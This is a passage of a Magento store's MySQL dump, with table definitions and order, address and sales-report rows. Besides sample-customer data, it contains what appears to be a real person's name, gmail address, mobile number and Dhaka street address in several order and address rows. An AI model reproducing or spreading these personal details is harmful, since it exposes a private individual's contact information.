  `discount_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Discount Invoiced',
  `discount_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Discount Refunded',
  `grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Grand Total',
  `shipping_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Amount',
  `shipping_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Canceled',
  `shipping_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Invoiced',
  `shipping_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Refunded',
  `shipping_tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Tax Amount',
  `shipping_tax_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Tax Refunded',
  `store_to_base_rate` decimal(12,4) DEFAULT NULL COMMENT 'Store To Base Rate',
  `store_to_order_rate` decimal(12,4) DEFAULT NULL COMMENT 'Store To Order Rate',
  `subtotal` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal',
  `subtotal_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal Canceled',
  `subtotal_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal Invoiced',
  `subtotal_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal Refunded',
  `tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Tax Amount',
  `tax_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Tax Canceled',
  `tax_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Tax Invoiced',
  `tax_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Tax Refunded',
  `total_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Total Canceled',
  `total_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Total Invoiced',
  `total_offline_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Total Offline Refunded',
  `total_online_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Total Online Refunded',
  `total_paid` decimal(20,4) DEFAULT NULL COMMENT 'Total Paid',
  `total_qty_ordered` decimal(12,4) DEFAULT NULL COMMENT 'Total Qty Ordered',
  `total_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Total Refunded',
  `can_ship_partially` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Can Ship Partially',
  `can_ship_partially_item` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Can Ship Partially Item',
  `customer_is_guest` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Customer Is Guest',
  `customer_note_notify` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Customer Note Notify',
  `billing_address_id` int(11) DEFAULT NULL COMMENT 'Billing Address ID',
  `customer_group_id` int(11) DEFAULT NULL,
  `edit_increment` int(11) DEFAULT NULL COMMENT 'Edit Increment',
  `email_sent` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Email Sent',
  `send_email` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Send Email',
  `forced_shipment_with_invoice` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Forced Do Shipment With Invoice',
  `payment_auth_expiration` int(11) DEFAULT NULL COMMENT 'Payment Authorization Expiration',
  `quote_address_id` int(11) DEFAULT NULL COMMENT 'Quote Address ID',
  `quote_id` int(11) DEFAULT NULL COMMENT 'Quote ID',
  `shipping_address_id` int(11) DEFAULT NULL COMMENT 'Shipping Address ID',
  `adjustment_negative` decimal(20,4) DEFAULT NULL COMMENT 'Adjustment Negative',
  `adjustment_positive` decimal(20,4) DEFAULT NULL COMMENT 'Adjustment Positive',
  `base_adjustment_negative` decimal(20,4) DEFAULT NULL COMMENT 'Base Adjustment Negative',
  `base_adjustment_positive` decimal(20,4) DEFAULT NULL COMMENT 'Base Adjustment Positive',
  `base_shipping_discount_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Discount Amount',
  `base_subtotal_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal Incl Tax',
  `base_total_due` decimal(20,4) DEFAULT NULL COMMENT 'Base Total Due',
  `payment_authorization_amount` decimal(20,4) DEFAULT NULL COMMENT 'Payment Authorization Amount',
  `shipping_discount_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Discount Amount',
  `subtotal_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal Incl Tax',
  `total_due` decimal(20,4) DEFAULT NULL COMMENT 'Total Due',
  `weight` decimal(12,4) DEFAULT NULL COMMENT 'Weight',
  `customer_dob` datetime DEFAULT NULL COMMENT 'Customer Dob',
  `increment_id` varchar(32) DEFAULT NULL COMMENT 'Increment ID',
  `applied_rule_ids` varchar(128) DEFAULT NULL COMMENT 'Applied Rule Ids',
  `base_currency_code` varchar(3) DEFAULT NULL COMMENT 'Base Currency Code',
  `customer_email` varchar(128) DEFAULT NULL COMMENT 'Customer Email',
  `customer_firstname` varchar(128) DEFAULT NULL COMMENT 'Customer Firstname',
  `customer_lastname` varchar(128) DEFAULT NULL COMMENT 'Customer Lastname',
  `customer_middlename` varchar(128) DEFAULT NULL COMMENT 'Customer Middlename',
  `customer_prefix` varchar(32) DEFAULT NULL COMMENT 'Customer Prefix',
  `customer_suffix` varchar(32) DEFAULT NULL COMMENT 'Customer Suffix',
  `customer_taxvat` varchar(32) DEFAULT NULL COMMENT 'Customer Taxvat',
  `discount_description` varchar(255) DEFAULT NULL COMMENT 'Discount Description',
  `ext_customer_id` varchar(32) DEFAULT NULL COMMENT 'Ext Customer ID',
  `ext_order_id` varchar(32) DEFAULT NULL COMMENT 'Ext Order ID',
  `global_currency_code` varchar(3) DEFAULT NULL COMMENT 'Global Currency Code',
  `hold_before_state` varchar(32) DEFAULT NULL COMMENT 'Hold Before State',
  `hold_before_status` varchar(32) DEFAULT NULL COMMENT 'Hold Before Status',
  `order_currency_code` varchar(3) DEFAULT NULL COMMENT 'Order Currency Code',
  `original_increment_id` varchar(32) DEFAULT NULL COMMENT 'Original Increment ID',
  `relation_child_id` varchar(32) DEFAULT NULL COMMENT 'Relation Child ID',
  `relation_child_real_id` varchar(32) DEFAULT NULL COMMENT 'Relation Child Real ID',
  `relation_parent_id` varchar(32) DEFAULT NULL COMMENT 'Relation Parent ID',
  `relation_parent_real_id` varchar(32) DEFAULT NULL COMMENT 'Relation Parent Real ID',
  `remote_ip` varchar(45) DEFAULT NULL COMMENT 'Remote Ip',
  `shipping_method` varchar(120) DEFAULT NULL,
  `store_currency_code` varchar(3) DEFAULT NULL COMMENT 'Store Currency Code',
  `store_name` varchar(255) DEFAULT NULL COMMENT 'Store Name',
  `x_forwarded_for` varchar(32) DEFAULT NULL COMMENT 'X Forwarded For',
  `customer_note` text DEFAULT NULL COMMENT 'Customer Note',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `total_item_count` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Total Item Count',
  `customer_gender` int(11) DEFAULT NULL COMMENT 'Customer Gender',
  `discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Amount',
  `base_discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Amount',
  `shipping_discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Discount Tax Compensation Amount',
  `base_shipping_discount_tax_compensation_amnt` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Discount Tax Compensation Amount',
  `discount_tax_compensation_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Invoiced',
  `base_discount_tax_compensation_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Invoiced',
  `discount_tax_compensation_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Refunded',
  `base_discount_tax_compensation_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Refunded',
  `shipping_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Incl Tax',
  `base_shipping_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Incl Tax',
  `coupon_rule_name` varchar(255) DEFAULT NULL COMMENT 'Coupon Sales Rule Name',
  `gift_message_id` int(11) DEFAULT NULL COMMENT 'Gift Message ID',
  `paypal_ipn_customer_notified` int(11) DEFAULT 0 COMMENT 'Paypal Ipn Customer Notified'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Order';

--
-- Dumping data for table `sales_order`
--

INSERT INTO `sales_order` (`entity_id`, `state`, `status`, `coupon_code`, `protect_code`, `shipping_description`, `is_virtual`, `store_id`, `customer_id`, `base_discount_amount`, `base_discount_canceled`, `base_discount_invoiced`, `base_discount_refunded`, `base_grand_total`, `base_shipping_amount`, `base_shipping_canceled`, `base_shipping_invoiced`, `base_shipping_refunded`, `base_shipping_tax_amount`, `base_shipping_tax_refunded`, `base_subtotal`, `base_subtotal_canceled`, `base_subtotal_invoiced`, `base_subtotal_refunded`, `base_tax_amount`, `base_tax_canceled`, `base_tax_invoiced`, `base_tax_refunded`, `base_to_global_rate`, `base_to_order_rate`, `base_total_canceled`, `base_total_invoiced`, `base_total_invoiced_cost`, `base_total_offline_refunded`, `base_total_online_refunded`, `base_total_paid`, `base_total_qty_ordered`, `base_total_refunded`, `discount_amount`, `discount_canceled`, `discount_invoiced`, `discount_refunded`, `grand_total`, `shipping_amount`, `shipping_canceled`, `shipping_invoiced`, `shipping_refunded`, `shipping_tax_amount`, `shipping_tax_refunded`, `store_to_base_rate`, `store_to_order_rate`, `subtotal`, `subtotal_canceled`, `subtotal_invoiced`, `subtotal_refunded`, `tax_amount`, `tax_canceled`, `tax_invoiced`, `tax_refunded`, `total_canceled`, `total_invoiced`, `total_offline_refunded`, `total_online_refunded`, `total_paid`, `total_qty_ordered`, `total_refunded`, `can_ship_partially`, `can_ship_partially_item`, `customer_is_guest`, `customer_note_notify`, `billing_address_id`, `customer_group_id`, `edit_increment`, `email_sent`, `send_email`, `forced_shipment_with_invoice`, `payment_auth_expiration`, `quote_address_id`, `quote_id`, `shipping_address_id`, `adjustment_negative`, `adjustment_positive`, `base_adjustment_negative`, `base_adjustment_positive`, `base_shipping_discount_amount`, `base_subtotal_incl_tax`, `base_total_due`, `payment_authorization_amount`, `shipping_discount_amount`, `subtotal_incl_tax`, `total_due`, `weight`, `customer_dob`, `increment_id`, `applied_rule_ids`, `base_currency_code`, `customer_email`, `customer_firstname`, `customer_lastname`, `customer_middlename`, `customer_prefix`, `customer_suffix`, `customer_taxvat`, `discount_description`, `ext_customer_id`, `ext_order_id`, `global_currency_code`, `hold_before_state`, `hold_before_status`, `order_currency_code`, `original_increment_id`, `relation_child_id`, `relation_child_real_id`, `relation_parent_id`, `relation_parent_real_id`, `remote_ip`, `shipping_method`, `store_currency_code`, `store_name`, `x_forwarded_for`, `customer_note`, `created_at`, `updated_at`, `total_item_count`, `customer_gender`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `discount_tax_compensation_invoiced`, `base_discount_tax_compensation_invoiced`, `discount_tax_compensation_refunded`, `base_discount_tax_compensation_refunded`, `shipping_incl_tax`, `base_shipping_incl_tax`, `coupon_rule_name`, `gift_message_id`, `paypal_ipn_customer_notified`) VALUES
(1, 'processing', 'processing', NULL, '334f632a18fb048e5aa9d3764d58bd3b', 'Flat Rate - Fixed', 0, 1, 1, 0.0000, NULL, 0.0000, NULL, 36.3900, 5.0000, NULL, 5.0000, NULL, 0.0000, NULL, 29.0000, NULL, 29.0000, NULL, 2.3900, NULL, 2.3900, NULL, 1.0000, 1.0000, NULL, 36.3900, 0.0000, NULL, NULL, 36.3900, NULL, NULL, 0.0000, NULL, 0.0000, NULL, 36.3900, 5.0000, NULL, 5.0000, NULL, 0.0000, NULL, 0.0000, 0.0000, 29.0000, NULL, 29.0000, NULL, 2.3900, NULL, 2.3900, NULL, NULL, 36.3900, NULL, NULL, 36.3900, 1.0000, NULL, NULL, NULL, 0, 1, 2, 1, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, NULL, NULL, 0.0000, 31.3900, 36.3900, NULL, 0.0000, 31.3900, 36.3900, 1.0000, '1973-12-15 00:00:00', '000000001', '1', 'BDT', 'roni_cost@example.com', 'Veronica', 'Costello', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'BDT', NULL, NULL, 'BDT', NULL, NULL, NULL, NULL, NULL, NULL, 'flatrate_flatrate', 'BDT', 'Main Website\nMain Website Store\nDefault Store View', NULL, NULL, '2020-08-08 01:45:18', '2020-08-08 01:45:20', 1, 2, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, NULL, 5.0000, 5.0000, NULL, NULL, 0),
(2, 'closed', 'closed', NULL, '1d36f8b844c055f7d90f6410ad45d1e4', 'Flat Rate - Fixed', 0, 1, 1, 0.0000, NULL, 0.0000, 0.0000, 39.6400, 5.0000, NULL, 5.0000, 5.0000, 0.0000, 0.0000, 32.0000, NULL, 32.0000, 32.0000, 2.6400, NULL, 2.6400, 2.6400, 1.0000, 1.0000, NULL, 39.6400, 0.0000, 39.6400, NULL, 39.6400, NULL, 39.6400, 0.0000, NULL, 0.0000, 0.0000, 39.6400, 5.0000, NULL, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, NULL, 32.0000, 32.0000, 2.6400, NULL, 2.6400, 2.6400, NULL, 39.6400, 39.6400, NULL, 39.6400, 1.0000, 39.6400, NULL, NULL, 0, 1, 4, 1, NULL, NULL, NULL, NULL, NULL, NULL, 2, 3, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 34.6400, 0.0000, NULL, 0.0000, 34.6400, 0.0000, 1.0000, '1973-12-15 00:00:00', '000000002', '1', 'BDT', 'roni_cost@example.com', 'Veronica', 'Costello', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'BDT', NULL, NULL, 'BDT', NULL, NULL, NULL, NULL, NULL, NULL, 'flatrate_flatrate', 'BDT', 'Main Website\nMain Website Store\nDefault Store View', NULL, NULL, '2020-08-08 01:45:23', '2020-08-08 01:45:27', 1, 2, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 5.0000, 5.0000, NULL, NULL, 0),
(3, 'new', 'pending', NULL, '04ceb65f20bd7a410cfbe244849e6b9e', 'Flat Rate - Fixed', 0, 1, NULL, -46.8000, NULL, NULL, NULL, 192.2000, 5.0000, NULL, NULL, NULL, 0.0000, NULL, 234.0000, NULL, NULL, NULL, 0.0000, NULL, NULL, NULL, 1.0000, 1.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, -46.8000, NULL, NULL, NULL, 192.2000, 5.0000, NULL, NULL, NULL, 0.0000, NULL, 0.0000, 0.0000, 234.0000, NULL, NULL, NULL, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1.0000, NULL, NULL, NULL, 1, 1, 6, 0, NULL, NULL, 1, NULL, NULL, NULL, 7, 5, NULL, NULL, NULL, NULL, 0.0000, 234.0000, 192.2000, NULL, 0.0000, 234.0000, 192.2000, 1.0000, NULL, '000000003', '2,3', 'BDT', 'sudipjeet.cse@gmail.com', 'Sudip', 'Dhali', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'BDT', NULL, NULL, 'BDT', NULL, NULL, NULL, NULL, NULL, '192.168.10.1', 'flatrate_flatrate', 'BDT', 'Main Website\nMain Website Store\nDefault Store View', NULL, NULL, '2020-08-23 05:43:23', '2020-08-23 05:43:24', 1, NULL, 0.0000, 0.0000, 0.0000, 0.0000, NULL, NULL, NULL, NULL, 5.0000, 5.0000, NULL, NULL, 0);

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_address`
--

CREATE TABLE `sales_order_address` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `parent_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Parent ID',
  `customer_address_id` int(11) DEFAULT NULL COMMENT 'Customer Address ID',
  `quote_address_id` int(11) DEFAULT NULL COMMENT 'Quote Address ID',
  `region_id` int(11) DEFAULT NULL COMMENT 'Region ID',
  `customer_id` int(11) DEFAULT NULL COMMENT 'Customer ID',
  `fax` varchar(255) DEFAULT NULL COMMENT 'Fax',
  `region` varchar(255) DEFAULT NULL COMMENT 'Region',
  `postcode` varchar(255) DEFAULT NULL COMMENT 'Postcode',
  `lastname` varchar(255) DEFAULT NULL COMMENT 'Lastname',
  `street` varchar(255) DEFAULT NULL COMMENT 'Street',
  `city` varchar(255) DEFAULT NULL COMMENT 'City',
  `email` varchar(255) DEFAULT NULL COMMENT 'Email',
  `telephone` varchar(255) DEFAULT NULL COMMENT 'Phone Number',
  `country_id` varchar(2) DEFAULT NULL COMMENT 'Country ID',
  `firstname` varchar(255) DEFAULT NULL COMMENT 'Firstname',
  `address_type` varchar(255) DEFAULT NULL COMMENT 'Address Type',
  `prefix` varchar(255) DEFAULT NULL COMMENT 'Prefix',
  `middlename` varchar(255) DEFAULT NULL COMMENT 'Middlename',
  `suffix` varchar(255) DEFAULT NULL COMMENT 'Suffix',
  `company` varchar(255) DEFAULT NULL COMMENT 'Company',
  `vat_id` text DEFAULT NULL COMMENT 'Vat ID',
  `vat_is_valid` smallint(6) DEFAULT NULL COMMENT 'Vat Is Valid',
  `vat_request_id` text DEFAULT NULL COMMENT 'Vat Request ID',
  `vat_request_date` text DEFAULT NULL COMMENT 'Vat Request Date',
  `vat_request_success` smallint(6) DEFAULT NULL COMMENT 'Vat Request Success'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Order Address';

--
-- Dumping data for table `sales_order_address`
--

INSERT INTO `sales_order_address` (`entity_id`, `parent_id`, `customer_address_id`, `quote_address_id`, `region_id`, `customer_id`, `fax`, `region`, `postcode`, `lastname`, `street`, `city`, `email`, `telephone`, `country_id`, `firstname`, `address_type`, `prefix`, `middlename`, `suffix`, `company`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`) VALUES
(1, 1, 1, 2, 33, NULL, NULL, 'Michigan', '49628-7978', 'Costello', '6146 Honey Bluff Parkway', 'Calder', 'roni_cost@example.com', '(555) 229-3326', 'US', 'Veronica', 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(2, 1, 1, 1, 33, NULL, NULL, 'Michigan', '49628-7978', 'Costello', '6146 Honey Bluff Parkway', 'Calder', 'roni_cost@example.com', '(555) 229-3326', 'US', 'Veronica', 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(3, 2, 1, 4, 33, NULL, NULL, 'Michigan', '49628-7978', 'Costello', '6146 Honey Bluff Parkway', 'Calder', 'roni_cost@example.com', '(555) 229-3326', 'US', 'Veronica', 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(4, 2, 1, 3, 33, NULL, NULL, 'Michigan', '49628-7978', 'Costello', '6146 Honey Bluff Parkway', 'Calder', 'roni_cost@example.com', '(555) 229-3326', 'US', 'Veronica', 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(5, 3, NULL, 20, NULL, NULL, NULL, NULL, '1000', 'Dhali', 'Naya Paltan', 'Dhaka', 'sudipjeet.cse@gmail.com', '01929656367', 'BD', 'Sudip', 'shipping', NULL, NULL, NULL, 'abc', NULL, NULL, NULL, NULL, NULL),
(6, 3, NULL, 24, NULL, NULL, NULL, NULL, '1000', 'Dhali', 'Naya Paltan', 'Dhaka', 'sudipjeet.cse@gmail.com', '01929656367', 'BD', 'Sudip', 'billing', NULL, NULL, NULL, 'abc', NULL, NULL, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_aggregated_created`
--

CREATE TABLE `sales_order_aggregated_created` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) NOT NULL COMMENT 'Order Status',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `total_qty_ordered` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Qty Ordered',
  `total_qty_invoiced` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Qty Invoiced',
  `total_income_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Income Amount',
  `total_revenue_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Revenue Amount',
  `total_profit_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Profit Amount',
  `total_invoiced_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Invoiced Amount',
  `total_canceled_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Canceled Amount',
  `total_paid_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Paid Amount',
  `total_refunded_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Refunded Amount',
  `total_tax_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Tax Amount',
  `total_tax_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Tax Amount Actual',
  `total_shipping_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Shipping Amount',
  `total_shipping_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Shipping Amount Actual',
  `total_discount_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Discount Amount',
  `total_discount_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Discount Amount Actual'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Order Aggregated Created';

--
-- Dumping data for table `sales_order_aggregated_created`
--

INSERT INTO `sales_order_aggregated_created` (`id`, `period`, `store_id`, `order_status`, `orders_count`, `total_qty_ordered`, `total_qty_invoiced`, `total_income_amount`, `total_revenue_amount`, `total_profit_amount`, `total_invoiced_amount`, `total_canceled_amount`, `total_paid_amount`, `total_refunded_amount`, `total_tax_amount`, `total_tax_amount_actual`, `total_shipping_amount`, `total_shipping_amount_actual`, `total_discount_amount`, `total_discount_amount_actual`) VALUES
(1, '2020-08-08', 1, 'closed', 1, 1.0000, 1.0000, 39.6400, 0.0000, -7.6400, 39.6400, 0.0000, 39.6400, 39.6400, 2.6400, 0.0000, 5.0000, 0.0000, 0.0000, 0.0000),
(2, '2020-08-08', 1, 'processing', 1, 1.0000, 1.0000, 36.3900, 29.0000, 29.0000, 36.3900, 0.0000, 36.3900, 0.0000, 2.3900, 2.3900, 5.0000, 5.0000, 0.0000, 0.0000),
(4, '2020-08-08', 0, 'closed', 1, 1.0000, 1.0000, 39.6400, 0.0000, -7.6400, 39.6400, 0.0000, 39.6400, 39.6400, 2.6400, 0.0000, 5.0000, 0.0000, 0.0000, 0.0000),
(5, '2020-08-08', 0, 'processing', 1, 1.0000, 1.0000, 36.3900, 29.0000, 29.0000, 36.3900, 0.0000, 36.3900, 0.0000, 2.3900, 2.3900, 5.0000, 5.0000, 0.0000, 0.0000);

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_aggregated_updated`
--

CREATE TABLE `sales_order_aggregated_updated` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) NOT NULL COMMENT 'Order Status',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `total_qty_ordered` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Qty Ordered',
  `total_qty_invoiced` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Qty Invoiced',
  `total_income_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Income Amount',
  `total_revenue_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Revenue Amount',
  `total_profit_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Profit Amount',
  `total_invoiced_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Invoiced Amount',
  `total_canceled_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Canceled Amount',
  `total_paid_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Paid Amount',
  `total_refunded_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Refunded Amount',
  `total_tax_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Tax Amount',
  `total_tax_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Tax Amount Actual',
  `total_shipping_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Shipping Amount',
  `total_shipping_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Shipping Amount Actual',
  `total_discount_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Discount Amount',
  `total_discount_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Discount Amount Actual'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Order Aggregated Updated';

--
-- Dumping data for table `sales_order_aggregated_updated`
--

INSERT INTO `sales_order_aggregated_updated` (`id`, `period`, `store_id`, `order_status`, `orders_count`, `total_qty_ordered`, `total_qty_invoiced`, `total_income_amount`, `total_revenue_amount`, `total_profit_amount`, `total_invoiced_amount`, `total_canceled_amount`, `total_paid_amount`, `total_refunded_amount`, `total_tax_amount`, `total_tax_amount_actual`, `total_shipping_amount`, `total_shipping_amount_actual`, `total_discount_amount`, `total_discount_amount_actual`) VALUES
(1, '2020-08-08', 1, 'closed', 1, 1.0000, 1.0000, 39.6400, 0.0000, -7.6400, 39.6400, 0.0000, 39.6400, 39.6400, 2.6400, 0.0000, 5.0000, 0.0000, 0.0000, 0.0000),
(2, '2020-08-08', 1, 'processing', 1, 1.0000, 1.0000, 36.3900, 29.0000, 29.0000, 36.3900, 0.0000, 36.3900, 0.0000, 2.3900, 2.3900, 5.0000, 5.0000, 0.0000, 0.0000),
(4, '2020-08-08', 0, 'closed', 1, 1.0000, 1.0000, 39.6400, 0.0000, -7.6400, 39.6400, 0.0000, 39.6400, 39.6400, 2.6400, 0.0000, 5.0000, 0.0000, 0.0000, 0.0000),
(5, '2020-08-08', 0, 'processing', 1, 1.0000, 1.0000, 36.3900, 29.0000, 29.0000, 36.3900, 0.0000, 36.3900, 0.0000, 2.3900, 2.3900, 5.0000, 5.0000, 0.0000, 0.0000);

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_grid`
--

CREATE TABLE `sales_order_grid` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `status` varchar(32) DEFAULT NULL COMMENT 'Status',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `store_name` varchar(255) DEFAULT NULL COMMENT 'Store Name',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `base_grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Base Grand Total',
  `base_total_paid` decimal(20,4) DEFAULT NULL COMMENT 'Base Total Paid',
  `grand_total` decimal(20,4) DEFAULT NULL COMMENT 'Grand Total',
  `total_paid` decimal(20,4) DEFAULT NULL COMMENT 'Total Paid',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `base_currency_code` varchar(3) DEFAULT NULL COMMENT 'Base Currency Code',
  `order_currency_code` varchar(255) DEFAULT NULL COMMENT 'Order Currency Code',
  `shipping_name` varchar(255) DEFAULT NULL COMMENT 'Shipping Name',
  `billing_name` varchar(255) DEFAULT NULL COMMENT 'Billing Name',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created At',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated At',
  `billing_address` varchar(255) DEFAULT NULL COMMENT 'Billing Address',
  `shipping_address` varchar(255) DEFAULT NULL COMMENT 'Shipping Address',
  `shipping_information` varchar(255) DEFAULT NULL COMMENT 'Shipping Method Name',
  `customer_email` varchar(255) DEFAULT NULL COMMENT 'Customer Email',
  `customer_group` varchar(255) DEFAULT NULL COMMENT 'Customer Group',
  `subtotal` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal',
  `shipping_and_handling` decimal(20,4) DEFAULT NULL COMMENT 'Shipping and handling amount',
  `customer_name` varchar(255) DEFAULT NULL COMMENT 'Customer Name',
  `payment_method` varchar(255) DEFAULT NULL COMMENT 'Payment Method',
  `total_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Total Refunded',
  `signifyd_guarantee_status` varchar(32) DEFAULT NULL COMMENT 'Signifyd Guarantee Disposition Status'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Order Grid';

--
-- Dumping data for table `sales_order_grid`
--

